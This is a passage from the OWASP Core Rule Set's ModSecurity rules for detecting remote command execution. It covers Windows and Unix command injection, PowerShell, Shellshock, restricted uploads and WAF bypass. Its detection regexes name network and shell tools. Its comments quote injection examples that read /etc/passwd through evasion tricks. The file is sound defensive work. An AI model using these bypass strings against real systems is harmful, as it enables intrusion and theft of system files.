t[\"\^]*f[\"\^]*o[\"\^]*r|h[\"\^]*o[\"\^]*a[\"\^]*m[\"\^]*i|g[\"\^]*e[\"\^]*t)|u[\"\^]*(?:s[\"\^]*(?:e[\"\^]*r[\"\^]*a[\"\^]*c[\"\^]*c[\"\^]*o[\"\^]*u[\"\^]*n[\"\^]*t[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]*t[\"\^]*r[\"\^]*o[\"\^]*l[\"\^]*s[\"\^]*e[\"\^]*t[\"\^]*t[\"\^]*i[\"\^]*n[\"\^]*g[\"\^]*s|r[\"\^]*s[\"\^]*t[\"\^]*a[\"\^]*t)|n[\"\^]*(?:r[\"\^]*a[\"\^]*r|z[\"\^]*i[\"\^]*p))|q[\"\^]*(?:u[\"\^]*e[\"\^]*r[\"\^]*y[\"\^]*(?:[\s,;]|\.|/|<|>).*|p[\"\^]*r[\"\^]*o[\"\^]*c[\"\^]*e[\"\^]*s[\"\^]*s|w[\"\^]*i[\"\^]*n[\"\^]*s[\"\^]*t[\"\^]*a|g[\"\^]*r[\"\^]*e[\"\^]*p)|o[\"\^]*(?:d[\"\^]*b[\"\^]*c[\"\^]*(?:a[\"\^]*d[\"\^]*3[\"\^]*2|c[\"\^]*o[\"\^]*n[\"\^]*f)|p[\"\^]*e[\"\^]*n[\"\^]*f[\"\^]*i[\"\^]*l[\"\^]*e[\"\^]*s)|v[\"\^]*(?:o[\"\^]*l[\"\^]*(?:[\s,;]|\.|/|<|>).*|e[\"\^]*r[\"\^]*i[\"\^]*f[\"\^]*y)|x[\"\^]*c[\"\^]*(?:a[\"\^]*c[\"\^]*l[\"\^]*s|o[\"\^]*p[\"\^]*y)|z[\"\^]*i[\"\^]*p[\"\^]*(?:[\s,;]|\.|/|<|>).*)(?:\.[\"\^]*\w+)?\b" \ "id:932115,\ phase:2,\ block,\ capture,\ t:none,\ msg:'Remote Command Execution: Windows Command Injection',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-shell',\ tag:'platform-windows',\ tag:'attack-rce',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # [ Windows PowerShell, cmdlets and options ] # # Detect some common PowerShell commands, cmdlets and options. # These commands should be relatively uncommon in normal text, but # potentially useful for code injection. # # If you are not running Windows, it is safe to disable this rule. # # https://technet.microsoft.com/en-us/magazine/ff714569.aspx # https://msdn.microsoft.com/en-us/powershell/scripting/core-powershell/console/powershell.exe-command-line-help # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile windows-powershell-commands.data" \ "id:932120,\ phase:2,\ block,\ capture,\ t:none,t:urlDecodeUni,t:cmdLine,t:lowercase,\ msg:'Remote Command Execution: Windows PowerShell Command Found',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-shell',\ tag:'language-powershell',\ tag:'platform-windows',\ tag:'attack-rce',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # [ Unix shell expressions ] # # Detects the following patterns which are common in Unix shell scripts # and one-liners: # # $(foo) Command substitution # ${foo} Parameter expansion # <(foo) Process substitution # >(foo) Process substitution # $((foo)) Arithmetic expansion # # Regexp generated from util/regexp-assemble/regexp-932130.data using Regexp::Assemble. # See https://coreruleset.org/20190826/optimizing-regular-expressions/ for usage. # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:\$(?:\((?:\(.*\)|.*)\)|\{.*\})|[<>]\(.*\))" \ "id:932130,\ phase:2,\ block,\ capture,\ t:none,t:urlDecodeUni,t:cmdLine,\ msg:'Remote Command Execution: Unix Shell Expression Found',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-shell',\ tag:'platform-unix',\ tag:'attack-rce',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # [ Windows FOR, IF commands ] # # This rule detects Windows command shell FOR and IF commands. # If you are not running Windows, it is safe to disable this rule. # # Examples: # # FOR %a IN (set) DO # FOR /D %a IN (dirs) DO # FOR /F "options" %a IN (text|"text") DO # FOR /L %a IN (start,step,end) DO # FOR /R C:\dir %A IN (set) DO # # IF [/I] [NOT] EXIST filename | DEFINED define | ERRORLEVEL n | CMDEXTVERSION n # IF [/I] [NOT] item1 [==|EQU|NEQ|LSS|LEQ|GTR|GEQ] item2 # IF [/I] [NOT] (item1) [==|EQU|NEQ|LSS|LEQ|GTR|GEQ] (item2) # # http://ss64.com/nt/if.html # http://ss64.com/nt/for.html # # Regexp generated from util/regexp-assemble/regexp-932140.data using Regexp::Assemble. # See https://coreruleset.org/20190826/optimizing-regular-expressions/ for usage. # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \b(?:if(?:/i)?(?: not)?(?: exist\b| defined\b| errorlevel\b| cmdextversion\b|(?: |\().*(?:\bgeq\b|\bequ\b|\bneq\b|\bleq\b|\bgtr\b|\blss\b|==))|for(?:/[dflr].*)? %+[^ ]+ in\(.*\)\s?do)" \ "id:932140,\ phase:2,\ block,\ capture,\ t:none,t:urlDecodeUni,t:cmdLine,\ msg:'Remote Command Execution: Windows FOR/IF Command Found',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-shell',\ tag:'platform-windows',\ tag:'attack-rce',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # [ Unix direct remote command execution ] # # Detects Unix commands at the start of a parameter (direct RCE). # Example: foo=wget%20www.example.com # # This case is different from command injection (rule 932100), where a # command string is appended (injected) to a regular parameter, and then # passed to a shell unescaped. # # This rule is also triggered by an Oracle WebLogic Remote Command Execution exploit: # [ Oracle WebLogic vulnerability CVE-2017-10271 - Exploit tested: https://www.exploit-db.com/exploits/43458 ] # # Due to a higher risk of false positives, the following changes have been # made relative to rule 932100: # 1) the set of commands is smaller # 2) we require a trailing space (denoting command parameters) or command # separator character after the command # # To rebuild the word list regexp: # cd util/regexp-assemble # cat regexp-932150.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl # # Then insert the assembled regexp into this template: # # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:^|=)\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]* # [regexp assembled from util/regexp-assemble/regexp-932150.txt] # [\\\\'\"]*(?:\s|;|\||&|<|>)" \ # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:^|=)\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]*(?:l[\\\\'\"]*(?:s(?:[\\\\'\"]*(?:b[\\\\'\"]*_[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*l[\\\\'\"]*e[\\\\'\"]*a[\\\\'\"]*s[\\\\'\"]*e|c[\\\\'\"]*p[\\\\'\"]*u|m[\\\\'\"]*o[\\\\'\"]*d|p[\\\\'\"]*c[\\\\'\"]*i|u[\\\\'\"]*s[\\\\'\"]*b|-[\\\\'\"]*F|o[\\\\'\"]*f))?|z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|c[\\\\'\"]*(?:a[\\\\'\"]*t|m[\\\\'\"]*p)|m[\\\\'\"]*(?:o[\\\\'\"]*r[\\\\'\"]*e|a)|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s)|e[\\\\'\"]*s[\\\\'\"]*s[\\\\'\"]*(?:(?:f[\\\\'\"]*i[\\\\'\"]*l|p[\\\\'\"]*i[\\\\'\"]*p)[\\\\'\"]*e|e[\\\\'\"]*c[\\\\'\"]*h[\\\\'\"]*o)|a[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*(?:l[\\\\'\"]*o[\\\\'\"]*g(?:[\\\\'\"]*i[\\\\'\"]*n)?|c[\\\\'\"]*o[\\\\'\"]*m[\\\\'\"]*m)|w[\\\\'\"]*p(?:[\\\\'\"]*-[\\\\'\"]*d[\\\\'\"]*o[\\\\'\"]*w[\\\\'\"]*n[\\\\'\"]*l[\\\\'\"]*o[\\\\'\"]*a[\\\\'\"]*d)?|f[\\\\'\"]*t[\\\\'\"]*p(?:[\\\\'\"]*g[\\\\'\"]*e[\\\\'\"]*t)?|y[\\\\'\"]*n[\\\\'\"]*x)|s[\\\\'\"]*(?:e[\\\\'\"]*(?:t[\\\\'\"]*(?:e[\\\\'\"]*n[\\\\'\"]*v|s[\\\\'\"]*i[\\\\'\"]*d)|n[\\\\'\"]*d[\\\\'\"]*m[\\\\'\"]*a[\\\\'\"]*i[\\\\'\"]*l|d)|h(?:[\\\\'\"]*\.[\\\\'\"]*d[\\\\'\"]*i[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*r[\\\\'\"]*i[\\\\'\"]*b)?|o[\\\\'\"]*(?:u[\\\\'\"]*r[\\\\'\"]*c[\\\\'\"]*e|c[\\\\'\"]*a[\\\\'\"]*t)|t[\\\\'\"]*r[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*g[\\\\'\"]*s|y[\\\\'\"]*s[\\\\'\"]*c[\\\\'\"]*t[\\\\'\"]*l|c[\\\\'\"]*(?:h[\\\\'\"]*e[\\\\'\"]*d|p)|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|f[\\\\'\"]*t[\\\\'\"]*p|u[\\\\'\"]*d[\\\\'\"]*o|s[\\\\'\"]*h|v[\\\\'\"]*n)|p[\\\\'\"]*(?:t[\\\\'\"]*a[\\\\'\"]*r(?:[\\\\'\"]*(?:d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p))?|y[\\\\'\"]*t[\\\\'\"]*h[\\\\'\"]*o[\\\\'\"]*n(?:[\\\\'\"]*(?:3(?:[\\\\'\"]*m)?|2))?|k[\\\\'\"]*(?:e[\\\\'\"]*x[\\\\'\"]*e[\\\\'\"]*c|i[\\\\'\"]*l[\\\\'\"]*l)|r[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*t[\\\\'\"]*e[\\\\'\"]*n[\\\\'\"]*v|(?:g[\\\\'\"]*r[\\\\'\"]*e|f[\\\\'\"]*t)[\\\\'\"]*p|e[\\\\'\"]*r[\\\\'\"]*l(?:[\\\\'\"]*5)?|h[\\\\'\"]*p(?:[\\\\'\"]*[57])?|i[\\\\'\"]*n[\\\\'\"]*g|o[\\\\'\"]*p[\\\\'\"]*d)|n[\\\\'\"]*(?:c(?:[\\\\'\"]*(?:\.[\\\\'\"]*(?:t[\\\\'\"]*r[\\\\'\"]*a[\\\\'\"]*d[\\\\'\"]*i[\\\\'\"]*t[\\\\'\"]*i[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*a[\\\\'\"]*l|o[\\\\'\"]*p[\\\\'\"]*e[\\\\'\"]*n[\\\\'\"]*b[\\\\'\"]*s[\\\\'\"]*d)|a[\\\\'\"]*t))?|e[\\\\'\"]*t[\\\\'\"]*(?:k[\\\\'\"]*i[\\\\'\"]*t[\\\\'\"]*-[\\\\'\"]*f[\\\\'\"]*t[\\\\'\"]*p|(?:s[\\\\'\"]*t|c)[\\\\'\"]*a[\\\\'\"]*t)|o[\\\\'\"]*h[\\\\'\"]*u[\\\\'\"]*p|p[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*g|s[\\\\'\"]*t[\\\\'\"]*a[\\\\'\"]*t)|t[\\\\'\"]*(?:c[\\\\'\"]*(?:p[\\\\'\"]*(?:t[\\\\'\"]*r[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*u[\\\\'\"]*t[\\\\'\"]*e|i[\\\\'\"]*n[\\\\'\"]*g)|s[\\\\'\"]*h)|r[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*u[\\\\'\"]*t[\\\\'\"]*e(?:[\\\\'\"]*6)?|i[\\\\'\"]*m[\\\\'\"]*e(?:[\\\\'\"]*o[\\\\'\"]*u[\\\\'\"]*t)?|a[\\\\'\"]*(?:i[\\\\'\"]*l(?:[\\\\'\"]*f)?|r)|e[\\\\'\"]*l[\\\\'\"]*n[\\\\'\"]*e[\\\\'\"]*t)|r[\\\\'\"]*(?:e[\\\\'\"]*(?:p[\\\\'\"]*(?:l[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*e|e[\\\\'\"]*a[\\\\'\"]*t)|a[\\\\'\"]*l[\\\\'\"]*p[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*h|n[\\\\'\"]*a[\\\\'\"]*m[\\\\'\"]*e)|u[\\\\'\"]*b[\\\\'\"]*y(?:[\\\\'\"]*(?:1(?:[\\\\'\"]*[89])?|2[\\\\'\"]*[012]))?|m[\\\\'\"]*(?:u[\\\\'\"]*s[\\\\'\"]*e|d[\\\\'\"]*i)[\\\\'\"]*r|n[\\\\'\"]*a[\\\\'\"]*n[\\\\'\"]*o|s[\\\\'\"]*y[\\\\'\"]*n[\\\\'\"]*c|c[\\\\'\"]*p)|b[\\\\'\"]*(?:z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*e|c[\\\\'\"]*a[\\\\'\"]*t)|s[\\\\'\"]*d[\\\\'\"]*(?:c[\\\\'\"]*a[\\\\'\"]*t|i[\\\\'\"]*f[\\\\'\"]*f|t[\\\\'\"]*a[\\\\'\"]*r)|u[\\\\'\"]*i[\\\\'\"]*l[\\\\'\"]*t[\\\\'\"]*i[\\\\'\"]*n|a[\\\\'\"]*s[\\\\'\"]*h)|m[\\\\'\"]*(?:y[\\\\'\"]*s[\\\\'\"]*q[\\\\'\"]*l[\\\\'\"]*(?:d[\\\\'\"]*u[\\\\'\"]*m[\\\\'\"]*p(?:[\\\\'\"]*s[\\\\'\"]*l[\\\\'\"]*o[\\\\'\"]*w)?|h[\\\\'\"]*o[\\\\'\"]*t[\\\\'\"]*c[\\\\'\"]*o[\\\\'\"]*p[\\\\'\"]*y|a[\\\\'\"]*d[\\\\'\"]*m[\\\\'\"]*i[\\\\'\"]*n|s[\\\\'\"]*h[\\\\'\"]*o[\\\\'\"]*w)|l[\\\\'\"]*o[\\\\'\"]*c[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*e|a[\\\\'\"]*i[\\\\'\"]*l[\\\\'\"]*q)|u[\\\\'\"]*(?:n[\\\\'\"]*(?:c[\\\\'\"]*o[\\\\'\"]*m[\\\\'\"]*p[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|l[\\\\'\"]*z[\\\\'\"]*m[\\\\'\"]*a|a[\\\\'\"]*m[\\\\'\"]*e|r[\\\\'\"]*a[\\\\'\"]*r|s[\\\\'\"]*e[\\\\'\"]*t|z[\\\\'\"]*i[\\\\'\"]*p|x[\\\\'\"]*z)|s[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*(?:(?:a[\\\\'\"]*d|m[\\\\'\"]*o)[\\\\'\"]*d|d[\\\\'\"]*e[\\\\'\"]*l))|x[\\\\'\"]*(?:z(?:[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|d[\\\\'\"]*(?:i[\\\\'\"]*f[\\\\'\"]*f|e[\\\\'\"]*c)|c[\\\\'\"]*(?:a[\\\\'\"]*t|m[\\\\'\"]*p)|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*e))?|a[\\\\'\"]*r[\\\\'\"]*g[\\\\'\"]*s)|z[\\\\'\"]*(?:(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e|i)[\\\\'\"]*p|c[\\\\'\"]*(?:a[\\\\'\"]*t|m[\\\\'\"]*p)|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*e|r[\\\\'\"]*u[\\\\'\"]*n|s[\\\\'\"]*h)|f[\\\\'\"]*(?:t[\\\\'\"]*p[\\\\'\"]*(?:s[\\\\'\"]*t[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*s|w[\\\\'\"]*h[\\\\'\"]*o)|i[\\\\'\"]*l[\\\\'\"]*e[\\\\'\"]*t[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*t|e[\\\\'\"]*t[\\\\'\"]*c[\\\\'\"]*h|g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p)|c[\\\\'\"]*(?:o[\\\\'\"]*(?:m[\\\\'\"]*m[\\\\'\"]*a[\\\\'\"]*n[\\\\'\"]*d|p[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*c)|u[\\\\'\"]*r[\\\\'\"]*l|s[\\\\'\"]*h|c)|e[\\\\'\"]*(?:g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|c[\\\\'\"]*h[\\\\'\"]*o|v[\\\\'\"]*a[\\\\'\"]*l|x[\\\\'\"]*e[\\\\'\"]*c|n[\\\\'\"]*v)|d[\\\\'\"]*(?:m[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*g|a[\\\\'\"]*s[\\\\'\"]*h|i[\\\\'\"]*f[\\\\'\"]*f|o[\\\\'\"]*a[\\\\'\"]*s)|g[\\\\'\"]*(?:z[\\\\'\"]*(?:c[\\\\'\"]*a[\\\\'\"]*t|i[\\\\'\"]*p)|r[\\\\'\"]*e[\\\\'\"]*p|c[\\\\'\"]*c)|j[\\\\'\"]*(?:o[\\\\'\"]*b[\\\\'\"]*s[\\\\'\"]*\s+[\\\\'\"]*-[\\\\'\"]*x|a[\\\\'\"]*v[\\\\'\"]*a)|w[\\\\'\"]*(?:h[\\\\'\"]*o[\\\\'\"]*a[\\\\'\"]*m[\\\\'\"]*i|g[\\\\'\"]*e[\\\\'\"]*t|3[\\\\'\"]*m)|i[\\\\'\"]*r[\\\\'\"]*b(?:[\\\\'\"]*(?:1(?:[\\\\'\"]*[89])?|2[\\\\'\"]*[012]))?|o[\\\\'\"]*n[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*t[\\\\'\"]*r|h[\\\\'\"]*(?:e[\\\\'\"]*a[\\\\'\"]*d|u[\\\\'\"]*p)|v[\\\\'\"]*i[\\\\'\"]*(?:g[\\\\'\"]*r|p[\\\\'\"]*w)|G[\\\\'\"]*E[\\\\'\"]*T)[\\\\'\"]*(?:\s|;|\||&|<|>)" \ "id:932150,\ phase:2,\ block,\ capture,\ t:none,\ msg:'Remote Command Execution: Direct Unix Command Execution',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-shell',\ tag:'platform-unix',\ tag:'attack-rce',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # [ Unix shell snippets ] # # Detect some common sequences found in shell commands and scripts. # # Some commands which were restricted in earlier rules due to FP, # have been added here with their full path, in order to catch some # cases where the full path is sent. # # This rule is also triggered by an Apache Struts Remote Code Execution exploit: # [ Apache Struts vulnerability CVE-2017-9805 - Exploit tested: https://www.exploit-db.com/exploits/42627 ] # # This rule is also triggered by an Oracle WebLogic Remote Command Execution exploit: # [ Oracle WebLogic vulnerability CVE-2017-10271 - Exploit tested: https://www.exploit-db.com/exploits/43458 ] SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile unix-shell.data" \ "id:932160,\ phase:2,\ block,\ capture,\ t:none,t:urlDecodeUni,t:cmdLine,t:normalizePath,t:lowercase,\ msg:'Remote Command Execution: Unix Shell Code Found',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-shell',\ tag:'platform-unix',\ tag:'attack-rce',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # [ Shellshock vulnerability (CVE-2014-6271 and CVE-2014-7169) ] # # Detect exploitation of "Shellshock" GNU Bash RCE vulnerability. # # Based on ModSecurity rules created by Red Hat. # Permission for use was granted by Martin Prpic # # https://access.redhat.com/articles/1212303 # SecRule REQUEST_HEADERS|REQUEST_LINE "@rx ^\(\s*\)\s+{" \ "id:932170,\ phase:2,\ block,\ capture,\ t:none,t:urlDecode,\ msg:'Remote Command Execution: Shellshock (CVE-2014-6271)',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-shell',\ tag:'platform-unix',\ tag:'attack-rce',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule ARGS_NAMES|ARGS|FILES_NAMES "@rx ^\(\s*\)\s+{" \ "id:932171,\ phase:2,\ block,\ capture,\ t:none,t:urlDecode,t:urlDecodeUni,\ msg:'Remote Command Execution: Shellshock (CVE-2014-6271)',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-shell',\ tag:'platform-unix',\ tag:'attack-rce',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # -=[ Restricted File Upload ]=- # # Detects attempts to upload a file with a forbidden filename. # # Many application contain Unrestricted File Upload vulnerabilities. # https://www.owasp.org/index.php/Unrestricted_File_Upload # # These might be abused to upload configuration files or other files # that affect the behavior of the web server, possibly causing remote # code execution. # SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEADERS:X-File-Name \ "@pmFromFile restricted-upload.data" \ "id:932180,\ phase:2,\ block,\ capture,\ t:none,t:lowercase,\ msg:'Restricted File Upload Attempt',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-rce',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:932013,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:932014,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" # # -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) # # # -=[ Rule 932200 ]=- # # Block RCE Bypass using different techniques: # - uninitialized variables (https://www.secjuice.com/web-application-firewall-waf-evasion/) # - string concatenations (https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0) # - globbing patterns (https://medium.com/secjuice/waf-evasion-techniques-718026d693d8) # # Examples: # - foo;cat$u+/etc$u/passwd # - bar;cd+/etc;/bin$u/ca*+passwd # - foo;ca\t+/et\c/pa\s\swd # - foo;c'at'+/etc/pa's'swd # # Regex notes: https://regex101.com/r/JgZFRi/7 # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ([*?`\\'][^/\n]+/|\$[({\[#a-zA-Z0-9]|/[^/]+?[*?`\\'])" \ "id:932200,\ phase:2,\ block,\ capture,\ t:none,t:lowercase,t:urlDecodeUni,\ msg:'RCE Bypass Technique',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-rce',\ tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ chain" SecRule MATCHED_VAR "@rx /" "t:none,t:urlDecodeUni,chain" SecRule MATCHED_VAR "@rx \s" "t:none,t:urlDecodeUni,\ setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:932015,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:932016,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" # # -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) # # Missing Unix commands have been added to a new word list i.e. # util/regexp-assemble/regexp-932106.txt # These commands may have a higher risk of false positives. # Therefore, they have been split off to a separate rule in PL3. # For explanation of this rule, see rule 932100. # # To rebuild the word list regexp: # cd util/regexp-assemble # cat regexp-932106.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl # # Then insert the assembled regexp into this template: # # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\(|\(\s*\))\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]* # [regexp assembled from util/regexp-assemble/regexp-932106.txt] # \b" \ # # This rule is a stricter sibling of rule 932100. SecRule 